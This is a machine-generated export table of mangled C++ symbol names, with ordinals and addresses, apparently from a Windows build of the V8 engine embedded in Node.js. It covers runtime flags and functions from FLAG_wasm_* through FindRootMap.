                                                                                                                                                                                                                                    ?FLAG_wasm_code_gc@internal@v8@@3_NA63920x14229ac57
                                                                                                                                                                                                                                    ?FLAG_wasm_debug_mask_for_testing@internal@v8@@3HA63930x14254653c
                                                                                                                                                                                                                                    ?FLAG_wasm_dynamic_tiering@internal@v8@@3_NA63940x14229ac40
                                                                                                                                                                                                                                    ?FLAG_wasm_enforce_bounds_checks@internal@v8@@3_NA63950x14254655d
                                                                                                                                                                                                                                    ?FLAG_wasm_fuzzer_gen_test@internal@v8@@3_NA63960x142546564
                                                                                                                                                                                                                                    ?FLAG_wasm_gc_js_interop@internal@v8@@3_NA63970x14254655b
                                                                                                                                                                                                                                    ?FLAG_wasm_generic_wrapper@internal@v8@@3_NA63980x14229ac2a
                                                                                                                                                                                                                                    ?FLAG_wasm_inlining@internal@v8@@3_NA63990x14254655e
                                                                                                                                                                                                                                    ?FLAG_wasm_inlining_budget_factor@internal@v8@@3_KA64000x14229ac58
                                                                                                                                                                                                                                    ?FLAG_wasm_inlining_max_size@internal@v8@@3_KA64010x14229ac60
                                                                                                                                                                                                                                    ?FLAG_wasm_lazy_compilation@internal@v8@@3_NA64020x142546568
                                                                                                                                                                                                                                    ?FLAG_wasm_lazy_validation@internal@v8@@3_NA64030x142546569
                                                                                                                                                                                                                                    ?FLAG_wasm_loop_peeling@internal@v8@@3_NA64040x142546563
                                                                                                                                                                                                                                    ?FLAG_wasm_loop_unrolling@internal@v8@@3_NA64050x14229ac56
                                                                                                                                                                                                                                    ?FLAG_wasm_math_intrinsics@internal@v8@@3_NA64060x14229ac55
                                                                                                                                                                                                                                    ?FLAG_wasm_max_code_space@internal@v8@@3IA64070x14229ac3c
                                                                                                                                                                                                                                    ?FLAG_wasm_max_initial_code_space_reservation@internal@v8@@3HA64080x142546570
                                                                                                                                                                                                                                    ?FLAG_wasm_max_mem_pages@internal@v8@@3IA64090x14229ac34
                                                                                                                                                                                                                                    ?FLAG_wasm_max_table_size@internal@v8@@3IA64100x14229ac38
                                                                                                                                                                                                                                    ?FLAG_wasm_memory_protection_keys@internal@v8@@3_NA64110x14229ac31
                                                                                                                                                                                                                                    ?FLAG_wasm_num_compilation_tasks@internal@v8@@3HA64120x14229ac2c
                                                                                                                                                                                                                                    ?FLAG_wasm_opt@internal@v8@@3_NA64130x14229ac52
                                                                                                                                                                                                                                    ?FLAG_wasm_simd_ssse3_codegen@internal@v8@@3_NA64140x14254656a
                                                                                                                                                                                                                                    ?FLAG_wasm_speculative_inlining@internal@v8@@3_NA64150x14254655f
                                                                                                                                                                                                                                    ?FLAG_wasm_stack_checks@internal@v8@@3_NA64160x14229ac54
                                                                                                                                                                                                                                    ?FLAG_wasm_staging@internal@v8@@3_NA64170x14254655c
                                                                                                                                                                                                                                    ?FLAG_wasm_test_streaming@internal@v8@@3_NA64180x14254651b
                                                                                                                                                                                                                                    ?FLAG_wasm_tier_mask_for_testing@internal@v8@@3HA64190x142546538
                                                                                                                                                                                                                                    ?FLAG_wasm_tier_up@internal@v8@@3_NA64200x14229ac33
                                                                                                                                                                                                                                    ?FLAG_wasm_tier_up_filter@internal@v8@@3HA64210x14229ac4c
                                                                                                                                                                                                                                    ?FLAG_wasm_tiering_budget@internal@v8@@3HA64220x14229ac44
                                                                                                                                                                                                                                    ?FLAG_wasm_type_canonicalization@internal@v8@@3_NA64230x142546562
                                                                                                                                                                                                                                    ?FLAG_wasm_write_protect_code_memory@internal@v8@@3_NA64240x14229ac30
                                                                                                                                                                                                                                    ?FLAG_win64_unwinding_info@internal@v8@@3_NA64250x14229ad41
                                                                                                                                                                                                                                    ?FLAG_write_code_using_rwx@internal@v8@@3_NA64260x14229abc9
                                                                                                                                                                                                                                    ?FLAG_write_protect_code_memory@internal@v8@@3_NA64270x14229ac88
                                                                                                                                                                                                                                    ?FLAG_zone_stats_tolerance@internal@v8@@3_KA64280x14229ac98
                                                                                                                                                                                                                                    ?FOpen@OS@base@v8@@SAPEAU_iobuf@@PEBD0@Z64290x140ff3cf0
                                                                                                                                                                                                                                    ?FPParameterCount@CallDescriptor@compiler@internal@v8@@QEBA_KXZ64300x14057ed40
                                                                                                                                                                                                                                    ?FPrint@OS@base@v8@@SAXPEAU_iobuf@@PEBDZZ64310x140ff3e20
                                                                                                                                                                                                                                    ?Fail@AsyncStreamingDecoder@wasm@internal@v8@@AEAAXXZ64320x1406688a0
                                                                                                                                                                                                                                    ?Fail@RegExpBytecodeGenerator@internal@v8@@UEAAXXZ64330x1408550f0
                                                                                                                                                                                                                                    ?Fail@RegExpMacroAssemblerX64@internal@v8@@UEAAXXZ64340x1405705f0
                                                                                                                                                                                                                                    ?FailureExpression@Parser@internal@v8@@AEAAPEAVExpression@23@XZ64350x1402d4f60
                                                                                                                                                                                                                                    ?FalseConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ64360x1410dee50
                                                                                                                                                                                                                                    ?FalseConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@XZ64370x1410e25a0
                                                                                                                                                                                                                                    ?FalseInputOf@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@PEAV5234@@Z64380x140585590
                                                                                                                                                                                                                                    ?FalsifyUndefined@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@V?$Flags@W4ComparisonOutcomeFlags@OperationTyper@compiler@internal@v8@@H@base@4@@Z64390x141249e60
                                                                                                                                                                                                                                    ?FarJumpSlotIndexToOffset@JumpTableAssembler@wasm@internal@v8@@SAII@Z64400x14053eb80
                                                                                                                                                                                                                                    ?FarJumpSlotOffsetToIndex@JumpTableAssembler@wasm@internal@v8@@SAII@Z64410x140624380
                                                                                                                                                                                                                                    ?FastApiCall@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$ZoneVector@UFastApiCallFunction@compiler@internal@v8@@@34@AEBUFeedbackSource@234@PEAVCallDescriptor@234@@Z64420x1410d76b0
                                                                                                                                                                                                                                    ?FastDtoa@base@v8@@YA_NNW4FastDtoaMode@12@HV?$Vector@D@12@PEAH2@Z64430x1410021c0
                                                                                                                                                                                                                                    ?FastFixedDtoa@base@v8@@YA_NNHV?$Vector@D@12@PEAH1@Z64440x141002700
                                                                                                                                                                                                                                    ?FastForwardSchedule@IncrementalMarking@internal@v8@@AEAAXXZ64450x140af6380
                                                                                                                                                                                                                                    ?FastForwardScheduleIfCloseToFinalization@IncrementalMarking@internal@v8@@AEAAXXZ64460x140af63b0
                                                                                                                                                                                                                                    ?FastNewFunctionContext@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ScopeType@23@@Z64470x140c0d480
                                                                                                                                                                                                                                    ?Fatal@internal@cppgc@@YAXAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AEBVSourceLocation@2@@Z64480x14050bbd0
                                                                                                                                                                                                                                    ?FatalException@node@@YAXPEAVIsolate@v8@@AEBVTryCatch@3@@Z64490x14029c210
                                                                                                                                                                                                                                    ?FatalImpl@internal@cppgc@@YAXPEBDAEBVSourceLocation@2@@Z64500x140517150
                                                                                                                                                                                                                                    ?FatalProcessOutOfHeapMemory@Isolate@internal@v8@@QEAAXPEBD@Z64510x14053f4c0
                                                                                                                                                                                                                                    ?FatalProcessOutOfHeapMemory@LocalIsolate@internal@v8@@QEAAXPEBD@Z64520x14050fb40
                                                                                                                                                                                                                                    ?FatalProcessOutOfMemory@internal@v8@@YAXPEAVIsolate@12@PEBD@Z64530x140c82840
                                                                                                                                                                                                                                    ?FeedbackIsInsufficient@JSHeapBroker@compiler@internal@v8@@QEBA_NAEBUFeedbackSource@234@@Z64540x1410b6dd0
                                                                                                                                                                                                                                    ?FeedbackVectorSpecPrint@FeedbackVectorSpec@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z64550x140b8c720
                                                                                                                                                                                                                                    ?FetchAndClearInterrupts@StackGuard@internal@v8@@AEAAHXZ64560x140b58550
                                                                                                                                                                                                                                    ?FetchBackgroundCounters@GCTracer@internal@v8@@AEAAXHH@Z64570x140b1a580
                                                                                                                                                                                                                                    ?FetchBackgroundGeneralCounters@GCTracer@internal@v8@@AEAAXXZ64580x140b1a620
                                                                                                                                                                                                                                    ?FetchBackgroundMarkCompactCounters@GCTracer@internal@v8@@AEAAXXZ64590x140b1a630
                                                                                                                                                                                                                                    ?FetchBackgroundMinorGCCounters@GCTracer@internal@v8@@AEAAXXZ64600x140b1a700
                                                                                                                                                                                                                                    ?FetchBytesMarkedConcurrently@IncrementalMarking@internal@v8@@AEAAXXZ64610x140af63f0
                                                                                                                                                                                                                                    ?FetchValue@LookupIterator@internal@v8@@AEBA?AV?$Handle@VObject@internal@v8@@@23@W4AllocationPolicy@23@@Z64620x1409334a0
                                                                                                                                                                                                                                    ?FieldAccessOf@compiler@internal@v8@@YAAEBUFieldAccess@123@PEBVOperator@123@@Z64630x1403a2160
                                                                                                                                                                                                                                    ?FieldIndexOf@LoadElimination@compiler@internal@v8@@CA?AVIndexRange@1234@AEBUFieldAccess@234@@Z64640x1411b97e0
                                                                                                                                                                                                                                    ?FieldIndexOf@LoadElimination@compiler@internal@v8@@CA?AVIndexRange@1234@HH@Z64650x1411b98b0
                                                                                                                                                                                                                                    ?FieldRepresentationDependencyOffTheRecord@CompilationDependencies@compiler@internal@v8@@QEBAPEBVCompilationDependency@234@AEBVMapRef@234@VInternalIndex@34@VRepresentation@34@@Z64660x1410bdb80
                                                                                                                                                                                                                                    ?FieldTypeDependencyOffTheRecord@CompilationDependencies@compiler@internal@v8@@QEBAPEBVCompilationDependency@234@AEBVMapRef@234@VInternalIndex@34@AEBVObjectRef@234@@Z64670x1410bdc20
                                                                                                                                                                                                                                    ?FileName@SourceLocation@cppgc@@QEBAPEBDXZ64680x1400978d0
                                                                                                                                                                                                                                    ?Fill@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@I@Z64690x140624390
                                                                                                                                                                                                                                    ?FillBufferWithValues@StateValuesCache@compiler@internal@v8@@AEAAIPEAV?$array@PEAVNode@compiler@internal@v8@@$07@std@@PEA_K1PEAPEAVNode@234@_KPEBVBytecodeLivenessState@234@@Z64700x1410e00c0
                                                                                                                                                                                                                                    ?FillEntriesWithHoles@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAXV?$Handle@VEphemeronHashTable@internal@v8@@@23@@Z64710x14090d3c0
                                                                                                                                                                                                                                    ?FillEntriesWithHoles@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SAXV?$Handle@VObjectHashTable@internal@v8@@@23@@Z64720x14090d3c0
                                                                                                                                                                                                                                    ?FilterSpillMoves@TopLevelLiveRange@compiler@internal@v8@@QEAAXPEAVTopTierRegisterAllocationData@234@AEBVInstructionOperand@234@@Z64730x14110d820
                                                                                                                                                                                                                                    ?FinalIncrementalMarkCompactSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ64740x140b1a710
                                                                                                                                                                                                                                    ?FinalizationRegistry_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ64750x14053f4e0
                                                                                                                                                                                                                                    ?FinalizationRegistry_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ64760x1407dfb50
                                                                                                                                                                                                                                    ?Finalize@ByteData@PreparseDataBuilder@internal@v8@@QEAAXPEAVZone@34@@Z64770x1408b6750
                                                                                                                                                                                                                                    ?Finalize@CodeObjectRegistry@internal@v8@@QEAAXXZ64780x140b48b00
                                                                                                                                                                                                                                    ?Finalize@EscapeAnalysisReducer@compiler@internal@v8@@UEAAXXZ64790x14115a840
                                                                                                                                                                                                                                    ?Finalize@JSCallReducer@compiler@internal@v8@@UEAAXXZ64800x141162230
                                                                                                                                                                                                                                    ?Finalize@JSToWasmWrapperCompilationUnit@wasm@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@34@XZ64810x1406bcf60
                                                                                                                                                                                                                                    ?Finalize@Reducer@compiler@internal@v8@@UEAAXXZ64820x1400971a0
                                                                                                                                                                                                                                    ?FinalizeBackgroundCompileTask@Compiler@internal@v8@@SA_NPEAVBackgroundCompileTask@23@PEAVIsolate@23@W4ClearExceptionFlag@123@@Z64830x140c04250
                                                                                                                                                                                                                                    ?FinalizeBlockScope@Scope@internal@v8@@QEAAPEAV123@XZ64840x140c64d50
                                                                                                                                                                                                                                    ?FinalizeChildren@PreparseDataBuilder@internal@v8@@AEAAXPEAVZone@23@@Z64850x1408b67e0
                                                                                                                                                                                                                                    ?FinalizeCode@CodeGenerator@compiler@internal@v8@@QEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@XZ64860x14106d4a0
                                                                                                                                                                                                                                    ?FinalizeCurrentEvent@GCTracer@internal@v8@@QEAAXXZ64870x140b1a720
                                                                                                                                                                                                                                    ?FinalizeFunction@BackgroundCompileTask@internal@v8@@QEAA_NPEAVIsolate@23@W4ClearExceptionFlag@Compiler@23@@Z64880x140c045b0
                                                                                                                                                                                                                                    ?FinalizeGarbageCollection@Heap@internal@cppgc@@AEAAXW4EmbedderStackState@3@@Z64890x1405179f0
                                                                                                                                                                                                                                    ?FinalizeGarbageCollection@StandaloneTestingHeap@testing@cppgc@@QEAAXW4EmbedderStackState@3@@Z64900x140504ef0
                                                                                                                                                                                                                                    ?FinalizeIncrementalGarbageCollectionForTesting@CppHeap@internal@v8@@EEAAXW4EmbedderStackState@cppgc@@@Z64910x140b3f730
                                                                                                                                                                                                                                    ?FinalizeIncrementalGarbageCollectionForTesting@Heap@internal@cppgc@@EEAAXW4EmbedderStackState@3@@Z64920x140517b00
                                                                                                                                                                                                                                    ?FinalizeIncrementalGarbageCollectionIfNeeded@CppHeap@internal@v8@@EEAAXW4EmbedderStackState@cppgc@@@Z64930x1400971a0
                                                                                                                                                                                                                                    ?FinalizeIncrementalGarbageCollectionIfNeeded@Heap@internal@cppgc@@EEAAXW4EmbedderStackState@3@@Z64940x140517b20
                                                                                                                                                                                                                                    ?FinalizeIncrementalGarbageCollectionIfRunning@Heap@internal@cppgc@@QEAAXUConfig@GarbageCollector@23@@Z64950x1405184b0
                                                                                                                                                                                                                                    ?FinalizeIncrementalMarkingAtomically@Heap@internal@v8@@QEAAXW4GarbageCollectionReason@23@@Z64960x140b04470
                                                                                                                                                                                                                                    ?FinalizeIncrementally@IncrementalMarking@internal@v8@@QEAAXXZ64970x140af6470
                                                                                                                                                                                                                                    ?FinalizeJob@OptimizedCompilationJob@internal@v8@@QEAA?AW4Status@CompilationJob@23@PEAVIsolate@23@@Z64980x140c04700
                                                                                                                                                                                                                                    ?FinalizeJumpOptimizationInfo@Assembler@internal@v8@@QEAAXXZ64990x1405fdf20
                                                                                                                                                                                                                                    ?FinalizeJumpOptimizationInfo@AssemblerBase@internal@v8@@QEAAXXZ65000x1400971a0
                                                                                                                                                                                                                                    ?FinalizeMaglevCompilationJob@Compiler@internal@v8@@SA_NPEAVMaglevCompilationJob@maglev@23@PEAVIsolate@23@@Z65010x140098380
                                                                                                                                                                                                                                    ?FinalizeMarking@IncrementalMarking@internal@v8@@QEAAXW4CompletionAction@123@@Z65020x140af6720
                                                                                                                                                                                                                                    ?FinalizeMoves@MoveOptimizer@compiler@internal@v8@@AEAAXPEAVInstruction@234@@Z65030x1410fed40
                                                                                                                                                                                                                                    ?FinalizeReparsedClassScope@ClassScope@internal@v8@@QEAAXPEAVIsolate@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@PEAVAstValueFactory@23@_N@Z65040x140c64e50
                                                                                                                                                                                                                                    ?FinalizeScript@BackgroundCompileTask@internal@v8@@QEAA?AV?$MaybeHandle@VSharedFunctionInfo@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VString@internal@v8@@@23@AEBUScriptDetails@23@@Z65050x140c04810
                                                                                                                                                                                                                                    ?FinalizeSerialization@ReadOnlySerializer@internal@v8@@QEAAXXZ65060x1407decc0
                                                                                                                                                                                                                                    ?FinalizeSerialization@SharedHeapSerializer@internal@v8@@QEAAXXZ65070x1407d52f0
                                                                                                                                                                                                                                    ?FinalizeSingleJob@LazyCompileDispatcher@internal@v8@@AEAA_NXZ65080x140bd99e0
                                                                                                                                                                                                                                    ?FinalizeTracing@EmbedderHeapTracer@v8@@QEAAXXZ65090x140c82850
                                                                                                                                                                                                                                    ?FinalizeTranslatedAsmJs@WasmEngine@wasm@internal@v8@@QEAA?AV?$Handle@VWasmModuleObject@internal@v8@@@34@PEAVIsolate@34@V?$Handle@VAsmWasmData@internal@v8@@@34@V?$Handle@VScript@internal@v8@@@34@@Z65100x14064caa0
                                                                                                                                                                                                                                    ?FinalizeTurbofanCompilationJob@Compiler@internal@v8@@SA_NPEAVTurbofanCompilationJob@23@PEAVIsolate@23@@Z65110x140c04b00
                                                                                                                                                                                                                                    ?Find@SignatureMap@wasm@internal@v8@@QEBAHAEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z65120x14066a700
                                                                                                                                                                                                                                    ?FindBreakablePosition@Debug@internal@v8@@AEAAHV?$Handle@VDebugInfo@internal@v8@@@23@H@Z65130x140bb9600
                                                                                                                                                                                                                                    ?FindChild@ProfileNode@internal@v8@@QEAAPEAV123@PEAVCodeEntry@23@H@Z65140x1408664b0
                                                                                                                                                                                                                                    ?FindClosestSharedFunctionInfoFromPosition@Debug@internal@v8@@QEAA?AV?$Handle@VSharedFunctionInfo@internal@v8@@@23@HV?$Handle@VScript@internal@v8@@@23@V423@@Z65150x140bb9940
                                                                                                                                                                                                                                    ?FindCodeObject@Isolate@internal@v8@@QEAA?AVCode@23@_K@Z65160x140b69c30
                                                                                                                                                                                                                                    ?FindDebugInfo@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@PEAPEAVDebugInfoListNode@23@1@Z65170x140bb9c20
                                                                                                                                                                                                                                    ?FindElementsKindTransitionedMap@Map@internal@v8@@QEAA?AV123@PEAVIsolate@23@AEBV?$vector@V?$Handle@VMap@internal@v8@@@internal@v8@@V?$allocator@V?$Handle@VMap@internal@v8@@@internal@v8@@@std@@@std@@W4ConcurrencyMode@23@@Z65180x140928760
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@PEAVHashTableKey@23@H@Z65190x14090d430
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z65200x14053f4f0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VName@internal@v8@@@23@H@Z65210x14053f5a0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VName@internal@v8@@@23@H@Z65220x14053f640
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VName@internal@v8@@@23@H@Z65230x14053f6d0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@IH@Z65240x14090d4e0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z65250x14053f760
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VObject@internal@v8@@@23@H@Z65260x14053f4f0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@V?$Handle@VString@internal@v8@@@23@H@Z65270x14090d5b0
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@IH@Z65280x14090d680
                                                                                                                                                                                                                                    ?FindEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@QEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@VString@23@H@Z65290x14090d750
                                                                                                                                                                                                                                    ?FindEntry@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z65300x1408f9e50
                                                                                                                                                                                                                                    ?FindEntry@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z65310x1408fa060
                                                                                                                                                                                                                                    ?FindEntry@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z65320x1408fa270
                                                                                                                                                                                                                                    ?FindEntry@?$SmallOrderedHashTable@VSmallOrderedNameDictionary@internal@v8@@@internal@v8@@QEAA?AVInternalIndex@23@PEAVIsolate@23@VObject@23@@Z65330x1408fa690
                                                                                                                                                                                                                                    ?FindEntry@CodeMap@internal@v8@@QEAAPEAVCodeEntry@23@_KPEA_K@Z65340x1408665b0
                                                                                                                                                                                                                                    ?FindEntry@IdentityMapBase@internal@v8@@IEBAPEA_K_K@Z65350x1407bb830
                                                                                                                                                                                                                                    ?FindEntry@OSROptimizedCodeCache@internal@v8@@AEAAHVSharedFunctionInfo@23@VBytecodeOffset@23@@Z65360x1408f5290
                                                                                                                                                                                                                                    ?FindEntry@OrderedNameDictionaryHandler@internal@v8@@SA?AVInternalIndex@23@PEAVIsolate@23@VHeapObject@23@VName@23@@Z65370x1408fa720
                                                                                                                                                                                                                                    ?FindEntry@Symbolizer@internal@v8@@AEAAPEAVCodeEntry@23@_KPEA_K@Z65380x14085db00
                                                                                                                                                                                                                                    ?FindFieldOwner@Map@internal@v8@@QEBA?AV123@PEAVIsolate@23@VInternalIndex@23@@Z65390x140928aa0
                                                                                                                                                                                                                                    ?FindFieldOwner@MapRef@compiler@internal@v8@@QEBA?AV1234@VInternalIndex@34@@Z65400x1410175b0
                                                                                                                                                                                                                                    ?FindFirstEmpty@SwissNameDictionary@internal@v8@@AEAAHI@Z65410x14053f810
                                                                                                                                                                                                                                    ?FindFrameStateBefore@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@0@Z65420x1410343f0
                                                                                                                                                                                                                                    ?FindFunctionsToRecompile@NativeModule@wasm@internal@v8@@QEAA?AV?$vector@HV?$allocator@H@std@@@std@@W4TieringState@234@@Z65430x1406615a0
                                                                                                                                                                                                                                    ?FindHandlerForMap@FeedbackNexus@internal@v8@@QEBA?AVMaybeObjectHandle@23@V?$Handle@VMap@internal@v8@@@23@@Z65440x1409aabb0
                                                                                                                                                                                                                                    ?FindInnermostContainingFunctionInfo@Debug@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VScript@internal@v8@@@23@H@Z65450x140bb9ce0
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65460x14090d830
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65470x14090d890
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65480x14090d900
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65490x14090d950
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65500x14090d890
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65510x14090d9b0
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65520x14090da20
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65530x14090d890
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65540x14090d890
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65550x14090d890
                                                                                                                                                                                                                                    ?FindInsertionEntry@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@IEAA?AVInternalIndex@23@VPtrComprCageBase@23@VReadOnlyRoots@23@I@Z65560x14090da20
                                                                                                                                                                                                                                    ?FindInstanceInPrototypeChain@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@V?$Local@VFunctionTemplate@v8@@@2@@Z65570x140c82880
                                                                                                                                                                                                                                    ?FindJumpTablesForRegionLocked@NativeModule@wasm@internal@v8@@QEBA?AUJumpTablesRef@1234@VAddressRegion@base@4@@Z65580x140661940
                                                                                                                                                                                                                                    ?FindObjectById@HeapProfiler@v8@@QEAA?AV?$Local@VValue@v8@@@2@I@Z65590x140c82a00
                                                                                                                                                                                                                                    ?FindOrAddChild@ProfileNode@internal@v8@@QEAAPEAV123@PEAVCodeEntry@23@H@Z65600x140866670
                                                                                                                                                                                                                                    ?FindOrAllocatePerThreadDataForThisThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@XZ65610x140b69c50
                                                                                                                                                                                                                                    ?FindOrInsert@SignatureMap@wasm@internal@v8@@QEAAIAEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z65620x14066a7a0
                                                                                                                                                                                                                                    ?FindOrInsertEntry@IdentityMapBase@internal@v8@@IEAA?AU?$IdentityMapFindResult@_K@23@_K@Z65630x1407bb880
                                                                                                                                                                                                                                    ?FindOrderedHashMapEntry@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65640x1410d7980
                                                                                                                                                                                                                                    ?FindOrderedHashMapEntryForInt32Key@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ65650x1410d7990
                                                                                                                                                                                                                                    ?FindPerThreadDataForThisThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@XZ65660x140b69d40
                                                                                                                                                                                                                                    ?FindPerThreadDataForThread@Isolate@internal@v8@@QEAAPEAVPerIsolateThreadData@123@VThreadId@23@@Z65670x140b69da0
                                                                                                                                                                                                                                    ?FindProjection@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@_K@Z65680x141034590
                                                                                                                                                                                                                                    ?FindRegion@RegionAllocator@base@v8@@AEAA?AV?$_Tree_const_iterator@V?$_Tree_val@U?$_Tree_simple_types@PEAVRegion@RegionAllocator@base@v8@@@std@@@std@@@std@@_K@Z65690x141000a40
                                                                                                                                                                                                                                    ?FindRootMap@Map@internal@v8@@QEBA?AV123@PEAVIsolate@23@@Z65700x140928b60
                                                                                                                                                                                                                                    ?FindRootMap@MapRef@compiler@internal@v8@@QEBA?AV1234@XZ65710x141017660
                                                                                                                                                                                                                                    ?FindRootMap@MapUpdater@internal@v8@@AEAA?AW4State@123@XZ65720x14092e7e0
